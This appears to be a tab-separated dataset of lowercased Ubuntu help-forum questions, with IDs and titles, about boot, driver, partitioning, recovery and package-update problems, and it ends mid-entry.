426811	lubuntu wo n't shut down on custom computer	i have just installed lubuntu on a custom computer with an intel d915gag motherboard , and it will not shut down , it will just keep showing the graphic with the little dots turning blue and white below the lubuntu logo . i am guessing that it needs drivers or something . i had also used a boot repair disc , which seems to look like it was built on lubuntu , and it did the same thing . any suggestions ? thank you , matt p. s. i may be only thirteen years old , but please feel free to use full technical descriptions and instructions , i have been using ubuntu and similar linux operating systems since i was ten ( but i had never used lubuntu before ) .
426815	hdd data recovery from a formatted ext4 into fat32	i 'm new to ubuntu but it did n't took me long to realize that it 's way better than privative options . i 've got it installed on a desktop pc and i also wanted to install it in a laptop which is not mine and the owner desired to keep pre-installed win 8 along with ubuntu . keeping that in mind i tried to create a recovery image of windows into an usb drive but , do n't ask me why , it was n't possible even though it had enough free space . then i made a serious mistake . i took my internal hdd which contained a lot of important data and tried to create the image there using a usb-sata interface . it was partitioned like this : 800 gb ext4 with data , then 200 gb ntfs containing nothing . i wrongly assumed that windows would use the ntfs partition and leave the ext4 alone but it did n't , it formatted 32gb into fat32 for the damned recovery image leaving the rest of the disk space unassigned . i 've made a real mess , guess i got used to all the warnings that linux gives us before taking bad decisions and crappy windows took me by surprise . i 've analysed the hdd using testdisk . the first attempt led me nowhere since it could n't find the ext4 partition ( even through deep search ) . then i took another shot this time selecting `` unpartitioned media '' instead of `` intel '' as partition table type . here are the results : disk /dev/sdb - 1000 gb / 931 gib - chs 121601 255 63 partition -- -- -- -- -- -- -- -- start -- -- -- -- -- -- -- -- end -- -- -- -- -- -- -- -- -- - size in sectors p ext4 -- -- -- -- -- -- -- -- -- - 0 32 31 -- -- -- -- 95493 4 61 -- -- -- -- 1534093312 [ ext4 ] p fat32 -- -- -- -- -- -- -- -- 0 32 33 -- -- -- - 4177 117 36 -- -- -- - 67108864 [ no name ] p ntfs -- -- -- -- -- -- -- - 5453 43 31 -- -- 5453 141 30 -- -- -- -- -- -- -- - 6174 [ boot ] p fat12 -- -- -- -- -- -- 5453 143 19 -- - 5454 217 30 -- -- -- -- -- -- -- - 20739 [ no name ] p ntfs -- -- -- -- -- -- -- -- 95493 5 1 -- -- 121601 57 56 -- -- -- - 419428352 [ ntfs ] structure : ok. keys t : change type , p : list files , enter : to continue ext4 large file sparse superblock backup superblock , 785 gb / 731 gib the good : the partition was found , and it is correctly labeled . the bad : when i access and try to list the files it says `` ca n't open filesystem . filesystem seems damaged '' . i 'm stucked at this point . thanks in advance !
426818	trying to connect to internet using : b-link bl_lw05-ar5	i am new using ubuntu and i am trying to make my old optiplex wireless with the lb link wireless adapter . i have tried download and installing the rtl8192_8188cu driver but i get a error message when running in terminal . chris @ optiplex : ~/desktop/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715 $ sudo bash install.sh [ sudo ] password for chris : auto install for 8192cu september , 1 2010 v 1.0.0 rtl8192_8188cu_linux_v3.0.2164.20110715/ rtl8192_8188cu_linux_v3.0.2164.20110715/autoconf_rtl8192c_usb_linux.h rtl8192_8188cu_linux_v3.0.2164.20110715/clean rtl8192_8188cu_linux_v3.0.2164.20110715/core/ rtl8192_8188cu_linux_v3.0.2164.20110715/core/efuse/ rtl8192_8188cu_linux_v3.0.2164.20110715/core/efuse/rtw_efuse.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_cmd.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_debug.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_eeprom.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_ieee80211.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_io.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_ioctl_query.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_ioctl_rtl.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_ioctl_set.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_mlme.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_mlme_ext.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_mp.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_mp_ioctl.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_p2p.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_pwrctrl.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_recv.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_rf.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_security.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_sta_mgt.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_wlan_util.c rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_xmit.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/ rtl8192_8188cu_linux_v3.0.2164.20110715/hal/hal_init.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/ rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/rtl8192c_cmd.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/rtl8192c_dm.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/rtl8192c_hal_init.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/rtl8192c_phycfg.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/rtl8192c_rf6052.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/rtl8192c_rxdesc.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/rtl8192c_sreset.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/usb/ rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/usb/hal8192cuhwimg.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/usb/rtl8192cu_led.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/usb/rtl8192cu_recv.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/usb/rtl8192cu_xmit.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/usb/usb_halinit.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/usb/usb_ops_ce.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/usb/usb_ops_linux.c rtl8192_8188cu_linux_v3.0.2164.20110715/hal/rtl8192c/usb/usb_ops_xp.c rtl8192_8188cu_linux_v3.0.2164.20110715/ifcfg-wlan0 rtl8192_8188cu_linux_v3.0.2164.20110715/include/ rtl8192_8188cu_linux_v3.0.2164.20110715/include/autoconf.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/basic_types.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/byteorder/ rtl8192_8188cu_linux_v3.0.2164.20110715/include/byteorder/big_endian.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/byteorder/generic.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/byteorder/little_endian.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/byteorder/swab.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/byteorder/swabb.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/circ_buf.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/cmd_osdep.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/drv_conf.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/drv_types.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/drv_types_ce.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/drv_types_linux.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/drv_types_xp.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/ethernet.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/farray.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/h2clbk.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/hal8192cehwimg.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/hal8192cphycfg.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/hal8192cphyreg.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/hal8192cuhwimg.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/hal8192dehwimg.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/hal8192detesthwimg.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/hal8192dphycfg.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/hal8192dphyreg.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/hal8192duhwimg.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/hal8192dutesthwimg.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/hal_init.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/ieee80211.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/ieee80211_ext.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/if_ether.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/ip.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/mlme_osdep.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/mp_custom_oid.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/nic_spec.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/osdep_ce_service.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/osdep_intf.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/osdep_service.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/pci_hal.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/pci_ops.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/pci_osintf.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/recv_osdep.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192c_cmd.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192c_dm.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192c_event.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192c_hal.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192c_led.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192c_recv.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192c_rf.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192c_spec.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192c_sreset.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192c_xmit.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192d_cmd.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192d_dm.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192d_hal.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192d_led.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192d_recv.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192d_rf.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192d_spec.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtl8192d_xmit.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_byteorder.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_cmd.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_debug.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_eeprom.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_efuse.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_event.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_ht.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_io.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_ioctl.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_ioctl_query.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_ioctl_rtl.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_ioctl_set.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_led.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_mlme.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_mlme_ext.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_mp.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_mp_ioctl.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_mp_phy_regdef.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_p2p.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_pwrctrl.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_qos.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_recv.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_rf.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_security.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_version.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/rtw_xmit.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/sdio_hal.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/sdio_ops.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/sdio_ops_ce.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/sdio_ops_linux.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/sdio_ops_xp.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/sdio_osintf.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/sta_info.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/usb_hal.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/usb_ops.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/usb_osintf.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/usb_vendor_req.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/wifi.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/wlan_bssdef.h rtl8192_8188cu_linux_v3.0.2164.20110715/include/xmit_osdep.h rtl8192_8188cu_linux_v3.0.2164.20110715/kconfig rtl8192_8188cu_linux_v3.0.2164.20110715/makefile rtl8192_8188cu_linux_v3.0.2164.20110715/os_dep/ rtl8192_8188cu_linux_v3.0.2164.20110715/os_dep/linux/ rtl8192_8188cu_linux_v3.0.2164.20110715/os_dep/linux/ioctl_linux.c rtl8192_8188cu_linux_v3.0.2164.20110715/os_dep/linux/mlme_linux.c rtl8192_8188cu_linux_v3.0.2164.20110715/os_dep/linux/os_intfs.c rtl8192_8188cu_linux_v3.0.2164.20110715/os_dep/linux/pci_intf.c rtl8192_8188cu_linux_v3.0.2164.20110715/os_dep/linux/recv_linux.c rtl8192_8188cu_linux_v3.0.2164.20110715/os_dep/linux/sdio_intf.c rtl8192_8188cu_linux_v3.0.2164.20110715/os_dep/linux/usb_intf.c rtl8192_8188cu_linux_v3.0.2164.20110715/os_dep/linux/xmit_linux.c rtl8192_8188cu_linux_v3.0.2164.20110715/os_dep/osdep_service.c rtl8192_8188cu_linux_v3.0.2164.20110715/runwpa rtl8192_8188cu_linux_v3.0.2164.20110715/wlan0dhcp rtl8192_8188cu_linux_v3.0.2164.20110715 authentication requested [ root ] for make driver : make arch=i386 cross_compile= -c /lib/modules/3.8.0-36-generic/build m=/home/chris/desktop/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-36-generic' cc [ m ] /home/chris/desktop/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_cmd.o in file included from /home/chris/desktop/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_cmd.c:24:0 : /home/chris/desktop/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715/include/osdep_service.h:49:29 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/chris/desktop/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715/core/rtw_cmd.o ] error 1 make [ 1 ] : *** [ _module_/home/chris/desktop/rtl8192cu_8188cus_8188ce-vau_linux_v3.0.2164.20110715/driver/rtl8192_8188cu_linux_v3.0.2164.20110715 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-36-generic' make : *** [ modules ] error 2 compile make driver error : 2 , please check error mesg i am not really sure what i am doing wrong , excuse my ignorance on this issue ( first time doing this ) . here is the information of what i am using : computer - dell optiplex 755 - intel® core™2 duo cpu e8400 @ 3.00ghz × 2 os - ubuntu 12.07 lts wifi adapter - lb-link model : bl_lw05-ar5 sorry it took so long , first chance to do this . here is what came up when i put that code in the terminal . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
426820	dual booting samsung ativ 9	i 've been trying to install ubuntu 13.10 on my new samsung ativ 9 and i 'm running into some problems with the bios . i 've followed the guides saying to disable secureboot , select csm ( compatibility support mode ) option , and turn off fastboot , but i 'm still having some issues . i am trying to setup my bios to read from a usb first , but when i go to boot priorities , i only have the option to launch windows or to disable the boot . how can i add boot from usb to this list ?
426824	where do i get packages via windows ?	i need packages , man . i ca n't find them . i can find 'source clones ' . are those packages ? i 'm not connect to the internet in linux , so i need to download the packages on my windows system . where do i get the packages ? where are the packages ? ! ? ! ? ! ? !
426828	sometimes my ubuntu 13.10 is slow and the mouse leaves a trail , on a high end pc	i 'm using a gaming pc but ubuntu randomly boots slow . i mean if it 's slow , it 's slow all the time until i restart . if it 's fast , it 's fast all the time until i restart . i have tried installing the nvidia drivers but they gave me a black screen and had to reinstall the entire os ( recovery mode did n't help ) . so i would prefer solutions that do n't involve these drivers . but even if the drivers could speed things up , i should n't need those , and the proof is that half the times everything works just fine . what can be causing this ?
426829	adobe connect and ubuntu 12.04	anyone else ever seen the issue where adobe connect just hangs while `` connecting '' ? i 've gone to the website . it tells me i do n't have the addon installed . i 've installed it , but it repeatedly tells me it is n't installed . any suggestions ?
426830	terrible sound quality ( might have two problem in my question )	i have recently changed my windows 8 for ubuntu 12.04 and this is fantastic ! but sadly the sound quality of my laptop did n't follow with the os transfer . i suspect ubuntu is using the motherboard speaker instead of the real speakers and when i browse a website with web cam chat room i heard weird noise coming from those who use theirs even when they are muted ! my laptop is an asus n750j with the neat extra speaker to increase the sound experience ( which doesnât work either ) here is how it looks :
426831	lxde auto login	i have a very old kubuntu server that i had to install lxde on in order to keep it going ( before lubuntu was born ) . i just upgraded it to 12.04 as i finally had a need for some more modern features . unfortunately i have no idea how to get auto login to the desktop working again . i have found suggestions that the following files should be edited /etc/lxdm/default.conf /etc/lxdm/lxdm.conf /etc/xdg/lxdm/lxdm.conf /etc/lightdm/lightdm.conf to include something like [ base ] # # uncomment and set autologin username to enable autologin autologin=username but none of these files exist on my system and i can not find any promising alternatives . any suggestions on what i should try or where i should look next would be greatly appreciated . thanks
426835	how to capture mouse/trackpad mode in splashtop client ?	i am using splashtop which is a remote desktop software which allows me to connect and control the computer using android . in the android client i can capture my mouse so that i can use the scroll wheel or hover over icons etc . but i can not capture the mouse in the linux client . how to capture mouse/trackpad mode in splashtop client on linux ?
426837	running programs missing in launcher	i 'm using 12.04 desktop . i often find that certain programs just do n't show or vanish from the launcher even while running . this is commonly seen with solitaire and now i see it with libre office writer . the running program is not in the launcher . i ca n't even see it in the listed processes . often a restart brings things to normal . but i 'd like to know how this can be fixed . thanks !
426838	where are the default user pictures/icons located ?	i 'm looking for a specific picture ubuntu has that would look good on my xp desktop in virtualbox . specifically , the icon of the jack russel . here 's the locations i tried : /var/lib/accountsservice/icons/eddy ( eddy is my username ) what happened : there 's no jack russel here ! just a picture of that pikachu wearing a hat i have as my user icon ! so , where are they located ?
426839	canon ip90 does n't not work with ubuntu	my canon ip90 printer does not seem to work with ubuntu 's driver . is there a solution for this anywhere . canon 's web site says there is no driver for the linux operating system but that one might be included with the operating system . it ca n't even print a test page .
426840	rhythmbox - how can i combine multiple library locations into one folder ( /music ) and not lose playlists ?	my home folder is extremely cluttered with various music folders . is there a way to move all of these into my /music directory without losing playlists ? i 'm currently on ubuntu 13.10 with rhythmbox 3.0 .
426844	newest libre office is n't installing through ppa	i 'm running ubuntu 12.04 lts and i 've followed the directions closely here : how do i install libreoffice 4 ? sudo add-apt-repository ppa : libreoffice/libreoffice-4-1 sudo apt-get update sudo apt-get dist-upgrade to add the ppa repository and then run update / upgrade . but when i actually run sudo apt-get upgrade i get : reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i 've downloaded the file manually ( libreoffice_4.2.1_linux_x86-64_rpm.tar.gz ) and executed it but i do n't know how to fill out the command line arguments : ~/downloads/libreoffice_4.2.1.1_linux_x86-64_rpm $ ./install usage : ./install [ -a , -- add ] [ -l , -- link ] [ -u , -- update ] [ -h , -- help ] < rpm-source-dir > < office-installation-dir > example : ./install . ~/libreoffice i should probably be doing ./install -u /path/to/install/here but how do i know where libre office is installed to right now ? i 'd like to upgrade my current version not install two side by side so i want to get these command line paramters right .
426846	ubuntu on windows	i am looking for ubuntu to run from the usb on windows . i am not looking for a bootable usb . my university has computers running on windows and i need to work on ubuntu . i was looking for something that lets ubuntu run on these machines . i did come across this http : //hacknmod.com/hack/ubuntu-linux-os-thumb-drive-windows-7/ any issues/alternatives/suggestions ? ps : coding is all i need this for . i do need the internet while working . thanks .
426850	how do i mount my internal hard disk when in `` try ubuntu '' mode ?	i am running the `` try ubuntu '' mode and i want to clear some of the data on the hard drive to install ubuntu , but i cant access the hard drive at all , the hard drive works though . i am new to linux and i want to know how to mount my c : drive on ubuntu . i put ubuntu on a usb flash drive cause the laptop i have does not have a cd bay the ubuntu menu came up as normal and i clicked `` install '' and the it said that my hard drive does n't have at least 5.9 gb available so i clicked `` try ubuntu '' so i can run a command to clear the hard drive , i noticed that ubuntu did n't mount the hard drive . i looked all over the internet but nothing solves the problem .
426851	i ca n't uninstall ubuntu and i have a single boot	i 'm new to the pc-building world and i built my first pc . i did n't want to pay for windows so i found linux was free and ubuntu was the best one . well now i have windows 8 on a usb drive and i ca n't uninstall ubuntu .
426853	what are the difference between maxlife and maxrenewlife in kerberos ?	i want to know if i set maxlife to three day , but my ticket issued only a day . so i want t o know the difference between maxlife and maxrenewlife .
426861	what is the correct way to create partitions for both windows and linux on an western digitalâs advanced format 1 tb hard drive ?	what is the correct way to create partitions for both windows and linux on an western digitalâs advanced format 1 tb hard drive ? i want partitions to be like this : = > primary : 325 gb windows 7 x64 = > extended : 125 gb d drive 095 gb e drive 135 gb ubuntu x86 245 gb fedora x64 6 gb swap for ubuntu and fedora . how do i do the partitioning using gparted ? this is what i have now : im seeing this error in disks ! the harddrive is fairly new . i have purchased that this month . my question is how can i fix the current partition table without re-partitioning ? if i have to partition then what vlaue will be optimal for the advanced format hardisk ? how to do the calculation ?
426863	stuck in tty , lightdm error ?	im running ubuntu 12.04 on virtualbox . i just updated to the latest version of virtual box , reinstalled any new guest additions , and all hell broke loose . fist ubuntu would restart in what i later found out was tty which ive never used or have any idea on how i go in there . then read that using right ctrl and f7 will switch back to the gui desktop that im used to . well that doesnt seem to work as i sometimes just get a black empty screen . other times ill just get a screen with a list of commands and then a blinking cursor at the bottom and nothing will progress from there . other times i will get an identical screen but this time it will have listed 'starting lightdm display manager ' [ failed ] , i dont know if this have anything to do with my issue or not . i would like to get some help in getting back to normal . what can i do ?
426865	ca n't upgrade to 13.10	my problems , which seem to be related , are as follows . i 'm using a toshiba satellite c660d laptop and i ca n't upgrade from ubuntu 13.04 to 13.10 . i can no longer even start ubuntu software centre ! i also keep getting a system program problem and and an internal error , when i 've just booted up , which i report , but then nothing is done about it and it still happens whenever i boot . i 've been using ubuntu linux for about 4 years now , so i 'm really depressed that i have n't really managed to understand and take control of it . i 've never compiled any source code , because there seems to be no standard list of requirements , so all my attempts stopped with different error messages . i have no idea how to customise ubuntu in any way i want , which i 've read is possible . i 've listed as much information as i can , i hope someone can help . the way i feel now , i 'm seriously considering deleting ubuntu and installing a distro which is n't based on debian , or even freebsd , aros , or aeros . when i try to force an upgrade from a terminal , here 's the error message i get - checking for a new ubuntu release traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 111 , in < module > useproposed=options.proposed_release ) file `` /usr/lib/python3/dist-packages/updatemanager/core/metarelease.py '' , line 90 , in __init__ self.flavor_name = get_ubuntu_flavor_name ( ) file `` /usr/lib/python3/dist-packages/updatemanager/core/utils.py '' , line 447 , in get_ubuntu_flavor_name pkg = get_ubuntu_flavor_package ( cache=cache ) file `` /usr/lib/python3/dist-packages/updatemanager/core/utils.py '' , line 437 , in get_ubuntu_flavor_package cache = apt.cache ( ) file `` /usr/lib/python3/dist-packages/apt/cache.py '' , line 105 , in __init__ self.open ( progress ) file `` /usr/lib/python3/dist-packages/apt/cache.py '' , line 150 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . the latest error message when typing update-manager from a terminal window is - ** ( update-manager:22677 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-30miqqjny0 : connection refused traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 114 , in < module > app = updatemanager ( data_dir , options ) file `` /usr/lib/python3/dist-packages/updatemanager/updatemanager.py '' , line 111 , in __init__ self.options and self.options.use_proposed ) file `` /usr/lib/python3/dist-packages/updatemanager/metareleasegobject.py '' , line 44 , in __init__ metareleasecore.__init__ ( self , usedevelopmentrelease , useproposed ) file `` /usr/lib/python3/dist-packages/updatemanager/core/metarelease.py '' , line 90 , in __init__ self.flavor_name = get_ubuntu_flavor_name ( ) file `` /usr/lib/python3/dist-packages/updatemanager/core/utils.py '' , line 447 , in get_ubuntu_flavor_name pkg = get_ubuntu_flavor_package ( cache=cache ) file `` /usr/lib/python3/dist-packages/updatemanager/core/utils.py '' , line 437 , in get_ubuntu_flavor_package cache = apt.cache ( ) file `` /usr/lib/python3/dist-packages/apt/cache.py '' , line 105 , in __init__ self.open ( progress ) file `` /usr/lib/python3/dist-packages/apt/cache.py '' , line 150 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . typing sudo apt-get update gives me a list of links i 'm not allowed to post , followed by - fetched 1,283 kb in 6s ( 197 kb/s ) reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring-security_main_i18n_translation-en % 5fgb e : the package lists or status file could not be parsed or opened . typing ls /boot gives the following - ls /boot abi-3.5.0-17-generic config-3.5.0-28-generic initrd.img-3.5.0-28-generic system.map-3.5.0-17-generic vmlinuz-3.5.0-28-generic abi-3.5.0-28-generic config-3.5.0-30-generic initrd.img-3.5.0-30-generic system.map-3.5.0-28-generic vmlinuz-3.5.0-30-generic abi-3.5.0-30-generic config-3.5.0-31-generic initrd.img-3.5.0-31-generic system.map-3.5.0-30-generic vmlinuz-3.5.0-31-generic abi-3.5.0-31-generic config-3.5.0-32-generic initrd.img-3.5.0-32-generic system.map-3.5.0-31-generic vmlinuz-3.5.0-32-generic abi-3.5.0-32-generic config-3.8.0-23-generic initrd.img-3.8.0-23-generic system.map-3.5.0-32-generic vmlinuz-3.8.0-23-generic abi-3.8.0-23-generic config-3.8.0-25-generic initrd.img-3.8.0-25-generic system.map-3.8.0-23-generic vmlinuz-3.8.0-25-generic abi-3.8.0-25-generic config-3.8.0-26-generic initrd.img-3.8.0-26-generic system.map-3.8.0-25-generic vmlinuz-3.8.0-26-generic abi-3.8.0-26-generic config-3.8.0-30-generic initrd.img-3.8.0-30-generic system.map-3.8.0-26-generic vmlinuz-3.8.0-30-generic abi-3.8.0-30-generic config-3.8.0-31-generic initrd.img-3.8.0-31-generic system.map-3.8.0-30-generic vmlinuz-3.8.0-31-generic abi-3.8.0-31-generic config-3.8.0-32-generic initrd.img-3.8.0-32-generic system.map-3.8.0-31-generic vmlinuz-3.8.0-32-generic abi-3.8.0-32-generic config-3.8.0-33-generic initrd.img-3.8.0-33-generic system.map-3.8.0-32-generic vmlinuz-3.8.0-33-generic abi-3.8.0-33-generic config-3.8.0-34-generic initrd.img-3.8.0-34-generic system.map-3.8.0-33-generic vmlinuz-3.8.0-34-generic abi-3.8.0-34-generic config-3.8.0-35-generic initrd.img-3.8.0-35-generic system.map-3.8.0-34-generic vmlinuz-3.8.0-35-generic abi-3.8.0-35-generic grub memtest86+.bin system.map-3.8.0-35-generic config-3.5.0-17-generic initrd.img-3.5.0-17-generic memtest86+_multiboot.bin vmlinuz-3.5.0-17-generic thanks for summing up my problem as being the package lists ! using that information , i found the following advice , although it 's not about 13.04 which i 'm running ... failed to load the package list after copying and pasting these commands into a terminal 